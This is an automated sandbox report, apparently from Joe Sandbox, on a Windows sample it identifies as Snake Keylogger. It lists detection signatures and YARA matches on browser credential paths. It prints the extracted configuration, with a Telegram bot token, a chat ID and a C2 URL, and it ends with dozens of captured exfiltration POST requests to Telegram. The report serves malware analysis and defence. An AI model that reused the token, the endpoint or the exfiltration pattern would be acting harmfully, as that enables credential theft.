Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0OZQi3b0tM.exe

Overview

General Information

Sample Name:0OZQi3b0tM.exe
Analysis ID:652382
MD5:a90c091abded4a4f763de7537f569167
SHA1:9394b05c2d518ee5d75fb030f2dca6d15c44bf0a
SHA256:653b29296dcc50bfb59898d3ba38748b1c484701079ccc85f45bd2c0e4ecbe3e
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Yara detected Generic Downloader
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 0OZQi3b0tM.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\0OZQi3b0tM.exe" MD5: A90C091ABDED4A4F763DE7537F569167)
  • cleanup
{"Exfil Mode": "Telegram", "Telegram Token": "5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c", "Telegram ID": "1856108848"}
{"C2 url": "https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendMessage"}
SourceRuleDescriptionAuthorStrings
0OZQi3b0tM.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
  • 0x1b1aa:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1a393:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1a7da:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1b95b:$a5: \Kometa\User Data\Default\Login Data
0OZQi3b0tM.exeJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0OZQi3b0tM.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0OZQi3b0tM.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        0OZQi3b0tM.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          sslproxydump.pcapMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xb0db3:$m1: | Snake Keylogger
          • 0x118431:$m1: | Snake Keylogger
          • 0x118ec8:$m1: | Snake Keylogger
          • 0x11995d:$m1: | Snake Keylogger
          • 0x11a3f2:$m1: | Snake Keylogger
          • 0x11ae87:$m1: | Snake Keylogger
          • 0x11b91c:$m1: | Snake Keylogger
          • 0x11c3b3:$m1: | Snake Keylogger
          • 0x11ce48:$m1: | Snake Keylogger
          • 0x11d8dd:$m1: | Snake Keylogger
          • 0x11e372:$m1: | Snake Keylogger
          • 0x11ee07:$m1: | Snake Keylogger
          • 0x11f89c:$m1: | Snake Keylogger
          • 0x120331:$m1: | Snake Keylogger
          • 0x120dc6:$m1: | Snake Keylogger
          • 0x12185b:$m1: | Snake Keylogger
          • 0x1222f0:$m1: | Snake Keylogger
          • 0x122d85:$m1: | Snake Keylogger
          • 0x12381a:$m1: | Snake Keylogger
          • 0x1242af:$m1: | Snake Keylogger
          • 0x124d44:$m1: | Snake Keylogger
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xd9d:$m1: | Snake Keylogger
          • 0xcd3:$m3: SnakePW
          00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x6c5:$m1: | Snake Keylogger
          • 0x5fb:$m3: SnakePW
          00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xbdd:$m1: | Snake Keylogger
          • 0xb13:$m3: SnakePW
          00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x7dd:$m1: | Snake Keylogger
          • 0x713:$m3: SnakePW
          00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0xdd5:$m1: | Snake Keylogger
          • 0xd0b:$m3: SnakePW
          Click to see the 118 entries
          SourceRuleDescriptionAuthorStrings
          0.2.0OZQi3b0tM.exe.530000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x1b1aa:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x1a393:$a3: \Google\Chrome\User Data\Default\Login Data
          • 0x1a7da:$a4: \Orbitum\User Data\Default\Login Data
          • 0x1b95b:$a5: \Kometa\User Data\Default\Login Data
          0.2.0OZQi3b0tM.exe.530000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.0OZQi3b0tM.exe.530000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              0.2.0OZQi3b0tM.exe.530000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.0.0OZQi3b0tM.exe.530000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1b1aa:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x1a393:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x1a7da:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1b95b:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 9 entries
                No Sigma rule has matched
                Timestamp:192.168.2.5193.122.130.049746802842536 06/26/22-09:32:22.672654
                SID:2842536
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0OZQi3b0tM.exeVirustotal: Detection: 73%Perma Link
                Source: 0OZQi3b0tM.exeMetadefender: Detection: 48%Perma Link
                Source: 0OZQi3b0tM.exeReversingLabs: Detection: 88%
                Source: 0OZQi3b0tM.exeAvira: detected
                Source: 0OZQi3b0tM.exeJoe Sandbox ML: detected
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpackMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c", "Telegram ID": "1856108848"}
                Source: 0OZQi3b0tM.exe.7100.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendMessage"}
                Source: 0OZQi3b0tM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49948 version: TLS 1.2
                Source: 0OZQi3b0tM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C67507h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C663D1h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6F539h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C68687h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C65F70h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6F991h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C66B10h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C67967h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6EC8Ah
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C67DC7h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6FDE9h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C6F0E1h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C68227h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C66B10h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 00C66B10h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 04EC0741h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 04EC02E9h
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 4x nop then jmp 04EC0B99h

                Networking

                barindex
                Source: TrafficSnort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.5:49746 -> 193.122.130.0:80
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeDNS query: name: checkip.dyndns.org
                Source: Yara matchFile source: 0OZQi3b0tM.exe, type: SAMPLE
                Source: Yara matchFile source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756c77a0974Host: api.telegram.orgContent-Length: 504Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d450ded5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d4bc2909Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d4fa25d0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d535c47fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d57ae485Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d5b1ba0cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d5f47c57Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d62b529cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d666ed16Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d69dc2b3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d6ea0e18Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d725a9d7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d763a5beHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d7a1a28aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d7dd3d95Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d82988cbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d875d3f9Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d8b3d0eaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d8ef6bb4Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d9348fb3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d96b65d8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d9a700e3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756d9e4fdfaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756da20995dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756da5e9696Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756daa3ba90Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dad82d11Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756db162a23Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756db6275f7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756db96eb51Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dbd4e751Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dc108764Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dc4756f0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dc82f3cdHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dccf3ddeHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dd2c38c7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ddc4cf8aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756de5d655eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dea2895dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dee54c34Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756df23493cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756df57bcdbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756df95b910Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756dfca2db5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e00f5165Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756e04626c2Host: api.telegram.orgContent-Length: 504
